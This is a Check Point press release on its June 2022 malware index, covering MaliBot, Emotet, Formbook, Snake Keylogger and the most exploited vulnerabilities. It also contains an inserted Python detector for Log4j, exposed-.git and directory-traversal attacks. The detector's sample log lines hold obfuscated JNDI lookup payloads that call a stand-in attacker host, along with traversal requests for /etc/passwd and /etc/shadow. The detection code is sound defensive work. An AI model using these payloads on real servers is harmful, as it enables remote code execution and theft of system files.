Most Wanted Malware of June 2022: New Banking Malware, MaliBot


SAN CARLOS, Calif., July 12, 2022 (GLOBE NEWSWIRE) — Check Point Research (CPR), the threat intelligence arm of Check Point® Software Technologies Ltd. (NASDAQ: CHKP), one of the world’s leading cybersecurity solution providers, has released its latest Global Threat Index for June 2022. CPR reports that a new Android banking malware, named MaliBot, has emerged following the takedown of FluBot at the end of May.

Although only recently discovered, MaliBot, an Android banking Trojan, has already reached third place in the list of the most widespread mobile malware. It disguises itself as cryptocurrency mining apps under different names and targets mobile banking users to steal financial information. Like FluBot, MaliBot uses phishing text messages (smishing) to trick victims into clicking a malicious link that redirects them to download a fake app containing the malware.

Also this month, the notorious Emotet remains the most prevalent malware overall. Snake Keylogger comes in at number three after rising from eighth place last month on increased activity. Snake’s main function is to log user keystrokes and transmit the collected data to threat actors. While in May CPR saw Snake Keylogger being delivered via PDF files, it has recently spread via emails carrying Word attachments labeled as requests for quotes. Researchers also reported a new Emotet variant in June that has credit-card-theft capabilities and targets Chrome browser users.

“While it’s always good to see law enforcement succeed in bringing down cybercriminal groups or malware like FluBot, it unfortunately didn’t take long for a new mobile malware to take its place,” said Maya Horowitz, vice president of research at Check Point Software. “Cybercriminals are well aware of the central role mobile devices play in the lives of many people and are constantly adapting and improving their tactics accordingly. The threat landscape is rapidly changing and mobile malware poses a significant threat to personal and business security. Having a robust mobile threat prevention solution has never been more important.”

CPR also revealed that “Apache Log4j Remote Code Execution” is the most commonly exploited vulnerability, affecting 43% of organizations worldwide, closely followed by “Web Server Exposed Git Repository Information Disclosure” with an overall impact of 42.3%. “Web Servers Malicious URL Directory Traversal” ranks third with an overall impact of 42.1%.

Top Malware Families

*The arrows refer to the change in ranking compared to the previous month.

This month, Emotet is still the most popular malware with an overall impact of 14%, followed by Formbook and Snake Keylogger, each affecting 4.4% of organizations worldwide.

  1. ↔ Emotet – Emotet is an advanced, self-propagating and modular Trojan. Emotet was once used as a banking Trojan but is now used mainly as a distributor for other malware or malicious campaigns. It uses multiple methods to maintain persistence and evasion techniques to avoid detection, and it spreads through phishing spam emails containing malicious attachments or links.
  2. ↔ Formbook – Formbook is an infostealer targeting the Windows operating system, first detected in 2016. It is marketed as Malware-as-a-Service (MaaS) on underground hacking forums for its strong evasion techniques and relatively low price. Formbook harvests credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute files on command from its C&C.
  3. ↑ Snake Keylogger – Snake is a modular .NET keylogger and credential stealer first spotted in late November 2020. Its main function is to log user keystrokes and transmit collected data to threat actors. Snake infections pose a major threat to users’ privacy and online security, as the malware can steal virtually any kind of sensitive information and is a particularly evasive and persistent keylogger.

The full list of the top ten malware families in June is available on Check Point’s blog.

Top Attacked Industries Worldwide

This month, education/research is still the most attacked industry in the world, followed by government/military and healthcare.

  1. Education & Research
  2. Government/Military
  3. Healthcare

Top Exploited Vulnerabilities

This month, “Apache Log4j Remote Code Execution” is the most commonly exploited vulnerability, affecting 43% of organizations worldwide, closely followed by “Web Server Exposed Git Repository Information Disclosure” with an overall impact of 42.3%. “Web Servers Malicious URL Directory Traversal” ranks third with an overall impact of 42.1%.

  1. Apache Log4j Remote Code Execution (CVE-2021-44228) – A remote code execution vulnerability exists in Apache Log4j: the library’s message lookup feature evaluates attacker-controlled strings such as ${jndi:ldap://…} that reach a log call and fetches code from the referenced server. Successful exploitation allows a remote attacker to execute arbitrary code on the affected system.
  2. ↑ Web Server Exposed Git Repository Information Disclosure – An information disclosure vulnerability has been reported in web servers that expose a Git repository (the .git directory) under the document root. Successful exploitation lets an attacker fetch the repository’s objects and history, which can disclose source code, configuration and account information.
  3. Web Servers Malicious URL Directory Traversal (CVE-2010-4598, CVE-2011-2474, CVE-2014-0130, CVE-2014-0780, CVE-2015-0666, CVE-2015-4068, CVE-2015-7254, CVE-2016-4523, CVE-2016-8530, CVE-2017-11512, CVE-2018-3948, CVE-2018-3949, CVE-2019-18952, CVE-2020-5410, CVE-2020-8260) – A directory traversal vulnerability exists on various web servers. The vulnerability is caused by an input validation error in a web server that does not properly sanitize the URL for directory traversal patterns. Successful exploitation allows unauthenticated remote attackers to disclose or access arbitrary files on the vulnerable server.
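As an added example (not Check Point’s code and not part of the original release), the following Python scans constructed Apache-style access-log lines for the three exploit classes listed above and pairs them with a hardened path resolver of the kind that closes the directory-traversal class. The web root, the log lines and the function names are assumptions made for the demo; the traversal check decodes twice to catch double-encoded dots, and the Log4j check collapses the ${lower:…} and ${::-…} lookup tricks commonly used to hide the “jndi” token.

```python
"""Added example, not Check Point's code: detection for the three exploit
classes in this month's index (Log4Shell JNDI lookups, exposed .git
directories, URL directory traversal) over constructed access-log lines,
plus a hardened path resolver for the traversal class."""
import posixpath
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

WEBROOT = "/var/www/html"  # assumed document root for the demo

REQ_RE = re.compile(r'"(?:GET|POST|HEAD|PUT) (\S+) HTTP/')
TRAVERSAL_RE = re.compile(r"\.\./")          # dot-dot-slash after decoding
GIT_RE = re.compile(r"(?:^|/)\.git(?:/|$)")  # /.git/HEAD, /.git/config, ...
# Log4j lookups used to hide "jndi": ${lower:j}, ${upper:J}, ${::-j}, ${env:X:-j}
LOOKUP_RE = re.compile(r"\$\{(?:lower|upper):([^{}$]*)\}", re.IGNORECASE)
DEFAULT_RE = re.compile(r"\$\{[^{}$]*:-([^{}$]*)\}")


def normalize_target(raw: str) -> str:
    """Percent-decode twice (catches %252e%252e%252f) and unify backslashes
    so the regexes see what the file system would act on."""
    s = raw
    for _ in range(2):
        s = unquote(s)
    return s.replace("\\", "/")


def is_traversal(target: str) -> bool:
    # Whole request target: the traversal may sit in a query parameter.
    return TRAVERSAL_RE.search(normalize_target(target)) is not None


def is_git_probe(target: str) -> bool:
    path = normalize_target(target).split("?", 1)[0]
    return GIT_RE.search(path) is not None


def deobfuscate_lookups(s: str) -> str:
    """Collapse nested Log4j lookups until nothing changes; every pass strips
    one ${...} wrapper, so the loop terminates."""
    prev = None
    while prev != s:
        prev = s
        s = LOOKUP_RE.sub(lambda m: m.group(1), s)
        s = DEFAULT_RE.sub(lambda m: m.group(1), s)
    return s


def is_jndi(line: str) -> bool:
    # Whole line: the payload usually travels in the User-Agent or another header.
    return "${jndi:" in deobfuscate_lookups(unquote(line)).lower()


def classify(line: str) -> List[str]:
    """Return the exploit classes a single access-log line matches."""
    hits = []
    m = REQ_RE.search(line)
    target = m.group(1) if m else ""
    if is_jndi(line):
        hits.append("log4j-jndi")
    if target and is_git_probe(target):
        hits.append("git-exposure")
    if target and is_traversal(target):
        hits.append("dir-traversal")
    return hits


def scan(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """(client IP, classes) for every line that matched at least one class."""
    out = []
    for line in lines:
        hits = classify(line)
        if hits:
            out.append((line.split(" ", 1)[0], hits))
    return out


def safe_resolve(webroot: str, request_path: str) -> Optional[str]:
    """Hardened form of the lookup the vulnerable servers got wrong: decode,
    normalize, then require the *resolved* path to stay under the root rather
    than blacklisting '..' (which misses encodings). Real code should also
    realpath() the result so symlinks cannot escape the root."""
    root = posixpath.normpath(webroot)
    rel = normalize_target(request_path).split("?", 1)[0].lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, rel))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


# Constructed combined-format log lines for the demo; not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jun/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [01/Jun/2022:10:00:02 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "curl/7.68.0"',
    '10.0.0.7 - - [01/Jun/2022:10:00:03 +0000] "GET /download?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843 "-" "python-requests/2.27"',
    '10.0.0.8 - - [01/Jun/2022:10:00:04 +0000] "GET /static/%252e%252e%252f%252e%252e%252fetc/shadow HTTP/1.1" 403 0 "-" "-"',
    '10.0.0.9 - - [01/Jun/2022:10:00:05 +0000] "GET /login HTTP/1.1" 200 0 "-" "${${lower:j}ndi:ldap://evil.example/a}"',
    '10.0.0.10 - - [01/Jun/2022:10:00:06 +0000] "GET /api?q=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.example/b} HTTP/1.1" 200 0 "-" "-"',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG):
        print(ip, hits)
    print(safe_resolve(WEBROOT, "/..%2F..%2Fetc/passwd"))  # None: escapes the root
```

Two design points worth noting. The traversal detector is deliberately a blacklist because it only has to raise an alert, whereas safe_resolve is an allowlist check on the resolved path, which is the only approach that survives new encodings; and the Log4j check is applied to the whole log line, not just the request target, because the lookup string usually arrives in a header that the application logs.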

Top Mobile Malware

This month AlienBot is the most prevalent mobile malware, followed by Anubis and MaliBot.

  1. AlienBot – The AlienBot malware family is Malware-as-a-Service (MaaS) for Android devices that allows a remote attacker, as a first step, to inject malicious code into legitimate financial apps. The attacker then gains access to victims’ accounts and ultimately takes complete control of their device.
  2. Anubis – Anubis is a banking Trojan designed for Android mobile phones. Since its initial detection, it has acquired additional features including Remote Access Trojan (RAT) functionality, a keylogger, audio recording capabilities, and various ransomware features. It has been detected in hundreds of different apps available on the Google Store.
  3. MaliBot – MaliBot is an Android banking malware that has been spotted targeting users in Spain and Italy. It disguises itself as crypto-mining apps under different names and focuses on stealing financial information, crypto wallets and other personal data.

Check Point’s Global Threat Impact Index and its ThreatCloud Map are powered by Check Point’s ThreatCloud Intelligence. ThreatCloud provides real-time threat intelligence derived from hundreds of millions of sensors around the world across networks, devices and mobiles. Intelligence is enhanced with AI-powered engines and proprietary research data from Check Point Research, the intelligence and research arm of Check Point Software Technologies.


Follow Check Point Research via:
Blog: https://research.checkpoint.com/
Twitter: https://twitter.com/_cpresearch_

About Check Point Research
Check Point Research provides cutting-edge cyber threat intelligence to Check Point Software customers and the wider intelligence community. The research team collects and analyzes global cyberattack data stored on ThreatCloud to keep hackers at bay, while ensuring that all Check Point products are updated with the latest protections. The research team consists of over 100 analysts and researchers cooperating with other security vendors, law enforcement and various CERTs.

About Check Point Software Technologies Ltd.
Check Point Software Technologies Ltd. (checkpoint.com) is a leading provider of cybersecurity solutions for businesses and governments worldwide. Check Point Infinity’s portfolio of solutions protects businesses and public organizations against 5th generation cyberattacks with an industry-leading capture rate of malware, ransomware and other threats. Infinity comprises three main pillars delivering uncompromising security and Generation V threat prevention in enterprise environments: Check Point Harmony, for remote users; Check Point CloudGuard, to automatically secure clouds; and Check Point Quantum, to protect network perimeters and data centers, all controlled by the industry’s most comprehensive and intuitive unified security management. Check Point protects more than 100,000 organizations of all sizes.
